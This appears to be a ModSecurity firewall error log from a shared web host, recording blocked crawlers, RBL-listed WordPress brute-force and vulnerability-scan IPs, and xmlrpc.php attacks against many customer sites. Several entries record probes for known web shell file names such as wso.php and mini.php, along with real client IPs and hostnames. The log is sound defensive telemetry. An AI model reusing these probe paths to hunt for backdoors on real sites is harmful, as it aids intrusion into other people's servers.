[Tue May 26 17:12:23.054021 2026] [security2:error] [pid 860158:tid 860333] [client 114.119.148.237:59133] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWHH4YFlz_JJsUnscK0xgAAALI"], referer: http://haddingtonwines.com/cart?remove_item=124461dcd3571e6674ec4e0e140cc298
[Tue May 26 17:12:23.368196 2026] [security2:error] [pid 860158:tid 860201] [remote 18.209.220.99:41667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWHH4YFlz_JJsUnscK00AAAiCo"]
[Tue May 26 17:12:23.984485 2026] [security2:error] [pid 860158:tid 860332] [client 45.86.200.15:21841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/admin.php"] [unique_id "ahWHH4YFlz_JJsUnscK04wAAALE"]
[Tue May 26 17:12:24.053565 2026] [security2:error] [pid 860158:tid 860319] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHH4YFlz_JJsUnscK03gAAAKQ"]
[Tue May 26 17:12:25.491110 2026] [security2:error] [pid 860158:tid 860315] [client 185.82.72.1:20743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.72.82.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/mah.php"] [unique_id "ahWHIYYFlz_JJsUnscK1JwAAAKA"]
[Tue May 26 17:12:26.121080 2026] [security2:error] [pid 860158:tid 860301] [client 209.99.189.98:60442] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/images/images/cache.php"] [unique_id "ahWHIoYFlz_JJsUnscK1QAAAAJI"], referer: www.google.com
[Tue May 26 17:12:26.308386 2026] [security2:error] [pid 860158:tid 860399] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHIYYFlz_JJsUnscK1OQAAAPQ"]
[Tue May 26 17:12:26.432059 2026] [security2:error] [pid 860158:tid 860396] [client 146.75.132.133:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWHIoYFlz_JJsUnscK1RQAAAPE"]
[Tue May 26 17:12:27.236732 2026] [security2:error] [pid 860158:tid 860314] [client 66.249.64.99:58305] ModSecurity: Access denied with code 429 (phase 2). Pattern match "Googlebot[\\\\/-]" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/google.conf"] [line "3"] [id "901003"] [msg "Googlebot Crawler 429 ADDED BY MONITORING DO NOT WHITELIST"] [hostname "www.acdealernoida.in"] [uri "/robots.txt"] [unique_id "ahWHI4YFlz_JJsUnscK1WAAAAJ8"]
[Tue May 26 17:12:27.262715 2026] [autoindex:error] [pid 860158:tid 860341] [client 43.134.141.244:0] AH01276: Cannot serve directory /home2/glorolle/public_html/proxuber.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://proxuber.com
[Tue May 26 17:12:27.369233 2026] [security2:error] [pid 860158:tid 860410] [client 45.86.200.34:33409] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/.wp/wso.php"] [unique_id "ahWHI4YFlz_JJsUnscK1XwAAAP8"]
[Tue May 26 17:12:27.381784 2026] [security2:error] [pid 860158:tid 860381] [client 103.174.5.177:43295] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHI4YFlz_JJsUnscK1YQAAAOI"]
[Tue May 26 17:12:27.381913 2026] [security2:error] [pid 860158:tid 860381] [client 103.174.5.177:43295] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHI4YFlz_JJsUnscK1YQAAAOI"]
[Tue May 26 17:12:28.723806 2026] [security2:error] [pid 860158:tid 860393] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHJIYFlz_JJsUnscK1hQAAAO4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:12:29.129582 2026] [security2:error] [pid 860158:tid 860340] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHJIYFlz_JJsUnscK1iAAAALk"]
[Tue May 26 17:12:29.354640 2026] [security2:error] [pid 860158:tid 860293] [client 203.194.101.7:63807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHJYYFlz_JJsUnscK1kgAAAIo"]
[Tue May 26 17:12:29.354827 2026] [security2:error] [pid 860158:tid 860293] [client 203.194.101.7:63807] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHJYYFlz_JJsUnscK1kgAAAIo"]
[Tue May 26 17:12:29.457456 2026] [security2:error] [pid 860158:tid 860333] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHJYYFlz_JJsUnscK1mAAAALI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1285277&moderation-hash=4e0d83967d61716d2f3f85439cb6c2c2
[Tue May 26 17:12:29.852566 2026] [security2:error] [pid 860158:tid 860410] [client 45.86.200.49:29945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/core.php"] [unique_id "ahWHJYYFlz_JJsUnscK1ogAAAP8"]
[Tue May 26 17:12:30.662872 2026] [security2:error] [pid 860158:tid 860322] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHJoYFlz_JJsUnscK1sQAAAKc"]
[Tue May 26 17:12:31.025974 2026] [security2:error] [pid 860158:tid 860393] [client 209.99.189.98:60815] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.189.99.209.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/images/images/cache.php"] [unique_id "ahWHJ4YFlz_JJsUnscK1ygAAAO4"], referer: www.google.com
[Tue May 26 17:12:31.588381 2026] [security2:error] [pid 860158:tid 860384] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWHJ4YFlz_JJsUnscK12QAAAOU"], referer: https://anujtradingco.com
[Tue May 26 17:12:32.677306 2026] [security2:error] [pid 860158:tid 860401] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHKIYFlz_JJsUnscK17wAAAPY"]
[Tue May 26 17:12:32.761907 2026] [security2:error] [pid 860158:tid 860390] [client 114.119.143.177:47963] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujoverseas.in"] [uri "/sounds-from-the-streets/"] [unique_id "ahWHKIYFlz_JJsUnscK1_QAAAOs"], referer: https://www.anujoverseas.in/sounds-from-the-streets/
[Tue May 26 17:12:32.776416 2026] [security2:error] [pid 860158:tid 860370] [client 45.86.200.23:37295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/robots.php"] [unique_id "ahWHKIYFlz_JJsUnscK1-QAAANc"]
[Tue May 26 17:12:33.132732 2026] [security2:error] [pid 860158:tid 860330] [client 114.119.146.197:37331] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.xllent.in"] [uri "/discountsalepage292e211ghu335753.php"] [unique_id "ahWHKYYFlz_JJsUnscK2BAAAAK8"], referer: http://www.xllent.in/discountsalepage292e211ghu335753.php?id=no-crease-hair-ties-cheetah-set-of-5-by-kenz-laurenz-p-11190.html%22%3ENo
[Tue May 26 17:12:34.138551 2026] [security2:error] [pid 860158:tid 860291] [client 45.86.200.42:30915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/inputs.php"] [unique_id "ahWHKoYFlz_JJsUnscK2IQAAAIg"]
[Tue May 26 17:12:34.657100 2026] [security2:error] [pid 860158:tid 860358] [client 45.86.200.25:33021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 25.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/mini.php"] [unique_id "ahWHKoYFlz_JJsUnscK2LgAAAMs"]
[Tue May 26 17:12:34.925979 2026] [security2:error] [pid 860158:tid 860346] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHKoYFlz_JJsUnscK2LQAAAL8"]
[Tue May 26 17:12:35.198994 2026] [security2:error] [pid 860158:tid 860326] [client 45.86.200.26:28711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/goods.php"] [unique_id "ahWHK4YFlz_JJsUnscK2PAAAAKs"]
[Tue May 26 17:12:35.710133 2026] [security2:error] [pid 860158:tid 860393] [client 23.21.212.31:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHK4YFlz_JJsUnscK2SwAAAO4"]
[Tue May 26 17:12:35.710529 2026] [security2:error] [pid 860158:tid 860331] [client 23.21.212.31:65224] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHK4YFlz_JJsUnscK2SQAAALA"]
[Tue May 26 17:12:35.928256 2026] [security2:error] [pid 860158:tid 860394] [client 23.21.212.31:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHK4YFlz_JJsUnscK2VAAAAO8"]
[Tue May 26 17:12:35.928868 2026] [security2:error] [pid 860158:tid 860399] [client 23.21.212.31:34460] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/"] [unique_id "ahWHK4YFlz_JJsUnscK2UQAAAPQ"]
[Tue May 26 17:12:36.308242 2026] [security2:error] [pid 860158:tid 860368] [client 23.21.212.31:0] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/index.html"] [unique_id "ahWHLIYFlz_JJsUnscK2YQAAANU"]
[Tue May 26 17:12:36.308896 2026] [security2:error] [pid 860158:tid 860379] [client 23.21.212.31:34464] ModSecurity: Warning. Matched phrase "ADmantX" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.samayikprasanga.in"] [uri "/"] [unique_id "ahWHLIYFlz_JJsUnscK2XwAAAOA"]
[Tue May 26 17:12:36.702901 2026] [security2:error] [pid 860158:tid 860335] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHLIYFlz_JJsUnscK2XgAAALQ"]
[Tue May 26 17:12:37.403679 2026] [security2:error] [pid 860158:tid 860382] [client 45.86.200.42:55861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/file5.php"] [unique_id "ahWHLYYFlz_JJsUnscK2fAAAAOM"]
[Tue May 26 17:12:38.363172 2026] [security2:error] [pid 860158:tid 860399] [client 45.86.200.47:41907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 47.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/ahax.php"] [unique_id "ahWHLoYFlz_JJsUnscK2lQAAAPQ"]
[Tue May 26 17:12:39.101613 2026] [security2:error] [pid 860158:tid 860366] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHLoYFlz_JJsUnscK2mwAAANM"]
[Tue May 26 17:12:39.325315 2026] [security2:error] [pid 860158:tid 860285] [remote 18.209.220.99:59191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.220.209.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahWHL4YFlz_JJsUnscK2qAAAvH4"]
[Tue May 26 17:12:39.720347 2026] [security2:error] [pid 860158:tid 860289] [client 203.194.101.7:64152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHL4YFlz_JJsUnscK2swAAAIY"]
[Tue May 26 17:12:39.720482 2026] [security2:error] [pid 860158:tid 860289] [client 203.194.101.7:64152] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWHL4YFlz_JJsUnscK2swAAAIY"]
[Tue May 26 17:12:39.740749 2026] [security2:error] [pid 860158:tid 860361] [client 45.86.200.22:27347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 22.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/f35.php"] [unique_id "ahWHL4YFlz_JJsUnscK2rwAAAM4"]
[Tue May 26 17:12:39.750024 2026] [security2:error] [pid 860158:tid 860312] [client 114.119.140.113:39383] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "onesoft.in"] [uri "/robots.txt"] [unique_id "ahWHL4YFlz_JJsUnscK2tAAAAJ0"]
[Tue May 26 17:12:40.098285 2026] [security2:error] [pid 860158:tid 860186] [remote 51.75.236.128:32444] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWHMIYFlz_JJsUnscK2vAAA1xs"]
[Tue May 26 17:12:40.098470 2026] [security2:error] [pid 860158:tid 860370] [client 51.75.236.128:32444] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.eco-green.com.mx"] [uri "/robots.txt"] [unique_id "ahWHMIYFlz_JJsUnscK2vAAA1xs"]
[Tue May 26 17:12:40.723549 2026] [security2:error] [pid 860158:tid 860340] [client 45.86.200.39:51103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/simple.php"] [unique_id "ahWHMIYFlz_JJsUnscK2ygAAALk"]
[Tue May 26 17:12:41.020177 2026] [security2:error] [pid 860158:tid 860310] [client 103.174.5.177:64146] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHMIYFlz_JJsUnscK2zAAAAJs"]
[Tue May 26 17:12:41.020290 2026] [security2:error] [pid 860158:tid 860310] [client 103.174.5.177:64146] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "obinnawrites.com"] [uri "/xmlrpc.php"] [unique_id "ahWHMIYFlz_JJsUnscK2zAAAAJs"]
[Tue May 26 17:12:41.560101 2026] [security2:error] [pid 860158:tid 860182] [remote 167.114.139.130:47684] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "www.eco-green.com.mx"] [uri "/"] [unique_id "ahWHMYYFlz_JJsUnscK25AAAnxc"]
[Tue May 26 17:12:41.560339 2026] [security2:error] [pid 860158:tid 860314] [client 167.114.139.130:47684] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.eco-green.com.mx"] [uri "/"] [unique_id "ahWHMYYFlz_JJsUnscK25AAAnxc"]
[Tue May 26 17:12:41.975598 2026] [security2:error] [pid 860158:tid 860328] [client 45.86.200.14:24367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/amax.php"] [unique_id "ahWHMYYFlz_JJsUnscK28AAAAK0"]
[Tue May 26 17:12:42.177986 2026] [security2:error] [pid 860158:tid 860325] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHMYYFlz_JJsUnscK27wAAAKo"]
[Tue May 26 17:12:42.875213 2026] [security2:error] [pid 860158:tid 860288] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHMoYFlz_JJsUnscK3BwAAAIU"]
[Tue May 26 17:12:43.906104 2026] [security2:error] [pid 860158:tid 860391] [client 45.86.200.50:48943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.200.86.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/update/f35.php"] [unique_id "ahWHM4YFlz_JJsUnscK3JQAAAOw"]
[Tue May 26 17:12:44.640265 2026] [security2:error] [pid 860158:tid 860332] [client 103.149.158.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWHNIYFlz_JJsUnscK3LAAAALE"]
[Tue May 26 17:12:44.800265 2026] [security2:error] [pid 860158:tid 860404] [client 185.82.72.1:21873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 1.72.82.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-content/hello.php"] [unique_id "ahWHNIYFlz_JJsUnscK3NQAAAPk"]
[Tue May 26 17:12:45.174111 2026] [security2:error] [pid 860158:tid 860258] [remote 121.200.216.55:33620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWHNIYFlz_JJsUnscK3PAAAt2M"]
[Tue May 26 17:12:45.819930 2026] [security2:error] [pid 860158:tid 860261] [remote 113.190.40.93:46612] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWHNYYFlz_JJsUnscK3SAAA6mY"]
